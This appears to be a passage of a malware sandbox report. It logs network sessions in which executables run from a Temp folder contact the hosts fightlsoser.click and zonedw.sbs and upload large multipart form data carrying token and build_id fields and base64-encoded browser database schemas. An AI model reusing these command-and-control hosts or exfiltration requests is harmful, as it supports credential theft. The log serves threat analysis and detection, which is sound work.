41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:14 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:54:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	50041	104.21.35.43	443	2044	C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:42 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fightlsoser.click
2024-12-13 17:54:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 17:54:43 UTC	1016	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bbk8c9untroejp3qjj7k3cm5f8; expires=Tue, 08-Apr-2025 11:41:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yO8jcOU7Trnq8cEJQhKsBlxAqf9MeGDh0jHdP7X4bRnDWOWMEWFTsYIV1lqMgLNNqLAyiqpsTjRjVyrJAs0qclnG7Vzx5p6ukAV3Fl2nLl%2BYakqngy%2FVSIJ9ijZAViy2pulbug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17d2267e7772b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2292&min_rtt=2085&rtt_var=1196&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=780331&cwnd=209&unsent_bytes=0&cid=da5b03e58a65f761&ts=1024&x=0"
2024-12-13 17:54:43 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-13 17:54:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	50046	23.55.153.106	443	2044	C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:46 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-13 17:54:47 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 13 Dec 2024 17:54:47 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=626d386d1f469346cbecf1a1; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-13 17:54:47 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-13 17:54:47 UTC	10097	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>
2024-12-13 17:54:47 UTC	1089	IN	Data Raw: 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e 65 72 73 20 69 6e 20 74 68 65 20 55 53 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 75 6e 74 72 69 65 73 2e 3c 62 72 2f 3e 53 6f 6d 65 20 67 65 6f 73 70 61 74 69 61 6c 20 64 61 74 61 20 6f 6e 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 Data Ascii: heir respective owners in the US and other countries.<br/>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	50054	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:54 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----9HDT0HDBIMOZMYUKNY5P User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 48 44 54 30 48 44 42 49 4d 4f 5a 4d 59 55 4b 4e 59 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 39 48 44 54 30 48 44 42 49 4d 4f 5a 4d 59 55 4b 4e 59 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 48 44 54 30 48 44 42 49 4d 4f 5a 4d 59 55 4b 4e 59 35 50 0d 0a 43 6f 6e 74 Data Ascii: ------9HDT0HDBIMOZMYUKNY5PContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------9HDT0HDBIMOZMYUKNY5PContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9HDT0HDBIMOZMYUKNY5PCont
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
